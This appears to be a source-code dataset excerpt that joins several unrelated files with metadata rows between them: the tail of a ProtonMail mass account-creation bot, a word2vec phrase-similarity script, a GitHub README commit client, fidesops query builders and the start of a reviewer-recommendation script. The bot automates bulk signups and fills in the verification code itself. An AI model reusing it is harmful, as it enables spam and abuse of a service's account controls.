driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
print ('\033[31m' + "Your New Email Adress is: ", rngusername,"@protonmail.com", sep='' + '\033[0m')
print ('\033[31m' + "Your New Email Password is: " + '\033[0m' , rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
                print('Please try verifying again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
            restart += 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331
| 218
| 0.539893
| 1,126
| 11,067
| 4.761989
| 0.250444
| 0.057814
| 0.098284
| 0.109847
| 0.418314
| 0.381574
| 0.338493
| 0.298769
| 0.242074
| 0.163372
| 0
| 0.024567
| 0.315894
| 11,067
| 292
| 219
| 37.900685
| 0.683001
| 0.239089
| 0
| 0.457143
| 0
| 0.08
| 0.354947
| 0.017586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011429
| false
| 0.028571
| 0.08
| 0
| 0.102857
| 0.074286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a
| 4,201
|
py
|
Python
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 2
|
2021-06-09T20:55:17.000Z
|
2021-11-03T03:07:37.000Z
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | null | null | null |
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 1
|
2020-07-26T02:31:38.000Z
|
2020-07-26T02:31:38.000Z
|
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model['resume'] -> This will return the NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
class PhraseVector:
def __init__(self, phrase):
self.vector = self.PhraseToVec(phrase)
# <summary> Calculates similarity between two sets of vectors based on the averages of the sets.</summary>
# <param>name = "vectorSet" description = "An array of arrays that needs to be condensed into a single array (vector). In this class, used to convert word vecs to phrases."</param>
# <param>name = "ignore" description = "The vectors within the set that need to be ignored. If this is an empty list, nothing is ignored. In this class, this would be stop words."</param>
# <returns> The condensed single vector that has the same dimensionality as the other vectors within the vecotSet.</returns>
def ConvertVectorSetToVecAverageBased(self, vectorSet, ignore = []):
if len(ignore) == 0:
return np.mean(vectorSet, axis = 0)
else:
            return np.dot(np.transpose(vectorSet), ignore) / sum(ignore)
def PhraseToVec(self, phrase):
cachedStopWords = stopwords.words("english")
phrase = phrase.lower()
wordsInPhrase = [word for word in phrase.split() if word not in cachedStopWords]
vectorSet = []
for aWord in wordsInPhrase:
try:
                wordVector = model[aWord]
vectorSet.append(wordVector)
except:
pass
return self.ConvertVectorSetToVecAverageBased(vectorSet)
# <summary> Calculates Cosine similarity between two phrase vectors.</summary>
# <param> name = "otherPhraseVec" description = "The other vector relative to which similarity is to be calculated."</param>
def CosineSimilarity(self, otherPhraseVec):
cosine_similarity = np.dot(self.vector, otherPhraseVec) / \
(np.linalg.norm(self.vector) * np.linalg.norm(otherPhraseVec))
try:
if math.isnan(cosine_similarity):
cosine_similarity = 0
except:
cosine_similarity = 0
return cosine_similarity
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053
| 191
| 0.615092
| 442
| 4,201
| 5.798643
| 0.423077
| 0.037456
| 0.030433
| 0.042138
| 0.078814
| 0.078814
| 0.057745
| 0.057745
| 0.057745
| 0
| 0
| 0.008527
| 0.190431
| 4,201
| 94
| 192
| 44.691489
| 0.745075
| 0.240895
| 0
| 0.238806
| 0
| 0
| 0.289137
| 0.194249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.014925
| 0.134328
| 0
| 0.268657
| 0.164179
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8f9f7ee5923a773fc310335335a5650e8aeefb
| 12,399
|
py
|
Python
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 8
|
2021-09-22T21:06:13.000Z
|
2022-03-27T09:52:55.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 6
|
2021-07-30T09:35:01.000Z
|
2022-03-30T13:16:03.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 2
|
2021-08-14T10:45:37.000Z
|
2021-11-20T12:41:13.000Z
|
"""
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
class AsyncGithubAPILite:
# * The following variables are declared for weak reference since there's no hint-typing inheritance.
envs: Any
logger: Logger
print_exception: Callable
"""
This child class is a scratch implementation based from Github API. It was supposed to be a re-write implementation of PyGithub for async,
but I just realized that I only need some certain components. This class also contains session for all HTTPS requests and that includes Badgen.
"""
async def __ainit__(self) -> None:
"""
Asynchronous init for instantiating other classes, if there's another one behind the MRO, which is the DiscordClientHandler.
This also instantiates aiohttp.ClientSession for future requests.
"""
self._api_session: ClientSession = ClientSession()
self.logger.info("ClientSession for API Requests has been instantiated.")
super().__init__()
self.logger.info(
f"Discord Client Instantiatied with intents={DISCORD_CLIENT_INTENTS=}"
)
self.logger.info(
f"{AsyncGithubAPILite.__name__} is done initializing other elements."
)
async def exec_api_actions(
self,
action: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> Union[None, list[Union[READMEIntegritySHA, Base64String]]]:
"""
A method that handles every possible requests by packaging required components into one. This was done so that we only have to call the method without worrying anything.
Args:
action (GithubRunnerActions): The action to perform. Choices should be FETCH_README and COMMIT_CHANGES.
data (Optional[list[tuple[READMEIntegritySHA, READMERawContent]]] , optional): The data required for COMMIT_CHANGES.
Basically it needs the old README SHA integrity and the new README in the form of Base64 (READMERawContent). Defaults to None.
Returns:
Union[None, list[Union[READMEIntegritySHA, Base64String]]]: This expects to return a list of READMEIntegritySHA and Base64 straight from b64decode or None.
"""
if action in GithubRunnerActions:
# We set up the paths for HttpsURL with the use of these two variables.
user_repo = (
"{0}/{0}".format(self.envs["GITHUB_ACTOR"])
if self.envs["PROFILE_REPOSITORY"] is None
else "{0}".format(self.envs["PROFILE_REPOSITORY"])
)
repo_path: HttpsURL = HttpsURL(
"{0}/repos/{1}/{2}".format(
self.envs["GITHUB_API_URL"],
user_repo,
"readme"
if action is GithubRunnerActions.FETCH_README
else "contents/README.md",
)
)
# When making requests, we may want to loop whenever the data we receive is malformed or the request failed to send.
while True:
http_request: ClientResponse = await self._request(
repo_path, action, data=data if data is not None else None
)
try:
if http_request.ok:
suffix_req_cost: str = (
"Remaining Requests over Rate-Limit (%s/%s)"
% (
http_request.headers["X-RateLimit-Remaining"],
http_request.headers["X-RateLimit-Limit"],
)
)
# For this action, decode the README (base64) into utf-8 (str), then strip unnecessary newlines.
if action is GithubRunnerActions.FETCH_README:
read_response: bytes = http_request.content.read_nowait()
serialized_response: dict = literal_eval(
read_response.decode("utf-8")
)
self.logger.info(
f"Github Profile ({user_repo}) README has been fetched. | {suffix_req_cost}"
)
return [
serialized_response["sha"],
Base64String(
serialized_response["content"].replace("\n", "")
),
]
# Since we just committed and there's nothing else to modify, just report that the request succeeded.
if action is GithubRunnerActions.COMMIT_CHANGES and data is not None:
self.logger.info(
f"README Changes from ({user_repo}) has been pushed through! | {suffix_req_cost}"
)
return None
# If none of those conditions were met, retry.
else:
self.logger.warning(
"Conditions were not met, retrying after 0.6 seconds (as a penalty)."
)
await sleep(0.6)
continue
# Same penalty applies for this case, where the data received is malformed.
except SyntaxError as e:
self.logger.warning(
f"Fetched Data is either incomplete or malformed. Attempting to re-fetch... | Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
)
await sleep(0.6)
continue
# Whenever we retry too often, we can't tell whether we are rate-limited, because the request still sets ClientResponse.ok to True.
# For this case, we handle it specially by inspecting the message.
except KeyError as e:
if serialized_response["message"].startswith(
"API rate limit exceeded"
):
msg: str = f"Request accepted but you are probably rate-limited by Github API. Did you keep on retrying or you are over-committing changes? | More Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, e)
terminate(ExitReturnCodes.RATE_LIMITED_EXIT)
else:
msg = f"The given value on `action` parameter is invalid! Ensure that the `action` is `{GithubRunnerActions}`!"
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
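# A minimal usage sketch (hypothetical; assumes `client` is a fully
# initialized composite instance that provides `envs`, `logger`, and
# `print_exception`, and `new_readme_raw` is the new README as READMERawContent):
#
#   fetched = await client.exec_api_actions(GithubRunnerActions.FETCH_README)
#   readme_sha, readme_b64 = fetched  # READMEIntegritySHA, Base64String
#   await client.exec_api_actions(
#       GithubRunnerActions.COMMIT_CHANGES, data=[readme_sha, new_readme_raw]
#   )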
async def _request(
self,
url: HttpsURL,
action_type: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> ClientResponse:
"""
An inner-private method that handles the requests by using packaged header and payload, necessarily for requests.
Args:
url (HttpsURL): The URL String to make Request.
action_type (GithubRunnerActions): The type of action that is recently passed on `exec_api_actions().`
data (Optional[list[Union[READMEIntegritySHA, READMERawContent]]], optional): The argument given in `exec_api_actions()`, now handled in this method.. Defaults to None.
Returns:
ClientResponse: The raw response given by the aiohttp.REST_METHODS. Returned without modification to give the receiver more options.
"""
if action_type in GithubRunnerActions:
self.logger.info(
"Attempting to Fetch README from Github API <<< {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
if action_type is GithubRunnerActions.FETCH_README
else "Attempting to Commit Changes of README from Github API >>> {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
)
# # This dictionary holds the headers and authentication applied to every request.
extra_contents: REQUEST_HEADER = {
"headers": {"Accept": "application/vnd.github.v3+json"},
"auth": BasicAuth(
self.envs["GITHUB_ACTOR"], self.envs["WORKFLOW_TOKEN"]
),
}
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
data_context: COMMIT_REQUEST_PAYLOAD = (
{
"content": READMEContent(bytes(data[1]).decode("utf-8")) if data is not None else None, # type: ignore # Keep in mind that the type-hint is already correct, I don't know what's the problem.]
"message": self.envs["COMMIT_MESSAGE"],
"sha": READMEIntegritySHA(str(data[0]))
if data is not None
else None,
"committer": {
"name": "Discord Activity Badge",
"email": "discord_activity@discord_bot.com",
},
}
if action_type is GithubRunnerActions.COMMIT_CHANGES
else {
"content": READMEContent(""),
"message": "",
"sha": READMEIntegritySHA(""),
"committer": {"name": "", "email": ""},
}
)
http_request: ClientResponse = await getattr(
self._api_session,
"get" if action_type is GithubRunnerActions.FETCH_README else "put",
)(url, json=data_context, allow_redirects=False, **extra_contents)
# todo: Clarify or confirm this. We don't have a case where we can see this in action.
if http_request.ok:
return http_request
# ! Sometimes we can exceed the rate limit of requests per time window. The receiver of this request has to handle displaying the error instead.
_resp_raw: ClientResponse = http_request
_resp_ctx: dict = literal_eval(str(_resp_raw))
self.logger.debug(_resp_ctx)
terminate(ExitReturnCodes.EXCEPTION_EXIT)
else:
msg: str = f"An Enum invoked on `action` parameter ({action_type.name}) is invalid! This is probably an issue from the developer, please contact the developer as possible."
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, None)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
| 46.092937
| 234
| 0.583595
| 1,316
| 12,399
| 5.398176
| 0.318389
| 0.016892
| 0.011824
| 0.008446
| 0.191723
| 0.157095
| 0.124578
| 0.114865
| 0.079673
| 0.079673
| 0
| 0.006031
| 0.344705
| 12,399
| 268
| 235
| 46.264925
| 0.868308
| 0.164771
| 0
| 0.16763
| 0
| 0.023121
| 0.190169
| 0.026911
| 0
| 0
| 0
| 0.003731
| 0
| 1
| 0
| false
| 0
| 0.046243
| 0
| 0.086705
| 0.023121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c9056dfb6354e5daafd7bffd768de97d7f13f54
| 11,790
|
py
|
Python
|
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
class QueryConfig(Generic[T], ABC):
"""A wrapper around a resource-type dependant query object that can generate runnable queries and string representations."""
class QueryToken:
"""A placeholder token for query output"""
def __str__(self) -> str:
return "?"
def __repr__(self) -> str:
return "?"
def __init__(self, node: TraversalNode):
self.node = node
@property
def fields(self) -> List[str]:
"""Fields of interest from this traversal traversal_node."""
return [f.name for f in self.node.node.collection.fields]
def update_fields(self, policy: Policy) -> List[str]:
"""List of update-able field names"""
def exists_child(
field_categories: List[str], policy_categories: List[str]
) -> bool:
"""A not very efficient check for any policy category that matches one of the field categories or a prefix of it."""
if field_categories is None or len(field_categories) == 0:
return False
for policy_category in policy_categories:
for field_category in field_categories:
if field_category.startswith(policy_category):
return True
return False
policy_categories = policy.get_erasure_target_categories()
return [
f.name
for f in self.node.node.collection.fields
if exists_child(f.data_categories, policy_categories)
]
@property
def primary_keys(self) -> List[str]:
"""List of fields marked as primary keys"""
return [f.name for f in self.node.node.collection.fields if f.primary_key]
@property
def query_keys(self) -> Set[str]:
"""
All of the possible keys that we can query for possible filter values.
These are keys that are the ends of incoming edges.
"""
return set(map(lambda edge: edge.f2.field, self.node.incoming_edges()))
def filter_values(self, input_data: Dict[str, List[Any]]) -> Dict[str, Any]:
"""
Return a filtered list of key/value sets of data items that are both in
the list of incoming edge fields, and contain data in the input data set
"""
return {
key: value
for (key, value) in input_data.items()
if key in self.query_keys
and isinstance(value, list)
and len(value)
and None not in value
}
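# Illustrative behavior (hypothetical values): with query_keys == {"email", "id"}
# and input_data == {"email": ["a@b.com"], "id": [], "extra": [1]}, filter_values
# returns {"email": ["a@b.com"]} -- "id" is dropped for being empty and "extra"
# for not being an incoming-edge field.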
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
values are assumed to be present and singulur and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
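# Illustrative output (hypothetical keys): {"id": [?], "email": [?, ?]} -- "id"
# comes solely from the root (identity) node, while "email" may have multiple
# upstream sources and is therefore represented by a pair of tokens.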
@abstractmethod
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy]
) -> Optional[T]:
"""Generate a retrieval query. If there is no data to be queried
(for example, if the policy identifies no fields to be queried)
returns None"""
@abstractmethod
def query_to_str(self, t: T, input_data: Dict[str, List[Any]]) -> str:
"""Convert query to string"""
@abstractmethod
def dry_run_query(self) -> Optional[str]:
"""dry run query for display"""
@abstractmethod
def generate_update_stmt(self, row: Row, policy: Optional[Policy]) -> Optional[T]:
"""Generate an update statement. If there is no data to be updated
(for example, if the policy identifies no fields to be updated)
returns None"""
class SQLQueryConfig(QueryConfig[TextClause]):
"""Query config that translates parameters into SQL statements."""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a retrieval query"""
filtered_data = self.filter_values(input_data)
if filtered_data:
clauses = []
query_data: Dict[str, Tuple[Any, ...]] = {}
field_list = ",".join(self.fields)
for field_name, data in filtered_data.items():
if len(data) == 1:
clauses.append(f"{field_name} = :{field_name}")
query_data[field_name] = (data[0],)
elif len(data) > 1:
clauses.append(f"{field_name} IN :{field_name}")
query_data[field_name] = tuple(set(data))
else:
# if there's no data, create no clause
pass
if len(clauses) > 0:
query_str = f"SELECT {field_list} FROM {self.node.node.collection.name} WHERE {' OR '.join(clauses)}"
return text(query_str).params(query_data)
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
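# For instance (hypothetical inputs), filtered_data of
# {"email": ["a@b.com"], "id": [1, 2]} over a collection named "customer"
# would produce roughly:
#   SELECT id,email FROM customer WHERE email = :email OR id IN :id
# with params {"email": ("a@b.com",), "id": (1, 2)}.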
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a SQL update statement in the form of a TextClause"""
update_fields = self.update_fields(policy)
update_value_map = {k: None for k in update_fields}
update_clauses = [f"{k} = :{k}" for k in update_fields]
pk_clauses = [f"{k} = :{k}" for k in self.primary_keys]
for pk in self.primary_keys:
update_value_map[pk] = row[pk]
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update statement for {self.node.address}"
)
return None
query_str = f"UPDATE {self.node.address.collection} SET {','.join(update_clauses)} WHERE {','.join(pk_clauses)}"
logger.info("query = %s, params = %s", query_str, update_value_map)
return text(query_str).params(update_value_map)
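# For example (hypothetical data): a row {"id": 1, "email": "a@b.com"} with
# "email" as the only update-able field and "id" as the primary key yields
# roughly:
#   UPDATE customer SET email = :email WHERE id = :id
# with params {"email": None, "id": 1} (erasure nulls out the targeted field).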
def query_to_str(self, t: TextClause, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
def transform_param(p: Any) -> str:
if isinstance(p, str):
return f"'{p}'"
return str(p)
query_str = str(t)
for k, v in input_data.items():
if len(v) == 1:
query_str = re.sub(f"= :{k}", f"= {transform_param(v[0])}", query_str)
elif len(v) > 0:
query_str = re.sub(f"IN :{k}", f"IN { tuple(set(v)) }", query_str)
return query_str
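# e.g. (hypothetical) a clause "SELECT a FROM t WHERE email = :email" with
# input_data {"email": ["a@b.com"]} renders as
# "SELECT a FROM t WHERE email = 'a@b.com'".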
def dry_run_query(self) -> Optional[str]:
query_data = self.display_query_data()
text_clause = self.generate_query(query_data, None)
if text_clause is not None:
return self.query_to_str(text_clause, query_data)
return None
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1},{k2:v2}...}, {$set: {f1:fv1, f2:fv2 ... }}, upsert=False).
This is returned as a tuple
({k1:v1},{k2:v2}...}, {f1:fv1, f2: fv2 ... }
"""
class MongoQueryConfig(QueryConfig[MongoStatement]):
"""Query config that translates paramters into mongo statements"""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
def transform_query_pairs(pairs: Dict[str, Any]) -> Dict[str, Any]:
"""Since we want to do an 'OR' match in mongo, transform queries of the form
{A:1, B:2} => "{$or:[{A:1},{B:2}]}".
Don't bother to do this if the pairs size is 1
"""
if len(pairs) < 2:
return pairs
return {"$or": [dict([(k, v)]) for k, v in pairs.items()]}
if input_data:
filtered_data = self.filter_values(input_data)
if filtered_data:
field_list = {field_name: 1 for field_name in self.fields}
query_pairs = {}
for field_name, data in filtered_data.items():
if len(data) == 1:
query_pairs[field_name] = data[0]
elif len(data) > 1:
query_pairs[field_name] = {"$in": data}
else:
# if there's no data, create no clause
pass
query_fields, return_fields = (
transform_query_pairs(query_pairs),
field_list,
)
return query_fields, return_fields
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
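# Illustrative result (hypothetical fields): input {"a": [1], "b": [2, 3]}
# yields roughly ({"$or": [{"a": 1}, {"b": {"$in": [2, 3]}}]}, {"a": 1, "b": 1}),
# assuming the collection declares exactly the fields "a" and "b".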
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
"""Generate a SQL update statement in the form of Mongo update statement components"""
update_fields = self.update_fields(policy)
update_clauses = {k: None for k in update_fields}
pk_clauses = {k: row[k] for k in self.primary_keys}
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update for {self.node.address}"
)
return None
return pk_clauses, {"$set": update_clauses}
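# e.g. (hypothetical) a primary key {"_id": 5} with "email" as the only
# update-able field returns ({"_id": 5}, {"$set": {"email": None}}).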
def query_to_str(self, t: MongoStatement, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
query_data, field_list = t
db_name = self.node.address.dataset
collection_name = self.node.address.collection
return f"db.{db_name}.{collection_name}.find({query_data}, {field_list})"
def dry_run_query(self) -> Optional[str]:
data = self.display_query_data()
mongo_query = self.generate_query(data, None)
if mongo_query is not None:
return self.query_to_str(mongo_query, data)
return None
| 38.655738
| 128
| 0.598473
| 1,532
| 11,790
| 4.475849
| 0.156658
| 0.016334
| 0.014438
| 0.0175
| 0.382529
| 0.356716
| 0.319236
| 0.257255
| 0.227651
| 0.216567
| 0
| 0.007356
| 0.296692
| 11,790
| 304
| 129
| 38.782895
| 0.819585
| 0.16972
| 0
| 0.313131
| 0
| 0.010101
| 0.081027
| 0.020146
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126263
| false
| 0.010101
| 0.050505
| 0.010101
| 0.348485
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c97c75c9954f8ab840e506c7e164088d7c58e96
| 17,208
|
py
|
Python
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | 2
|
2020-05-25T08:20:54.000Z
|
2020-05-25T08:21:02.000Z
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
# Preprocessing function definition
def remove_string_special_characters(s):
stripped = re.sub(r'[^a-zA-Z\s]', '', s)
stripped = re.sub('_', '', stripped)
stripped = re.sub(r'\s+', ' ', stripped)
stripped = stripped.strip()
if stripped != '':
return stripped.lower()
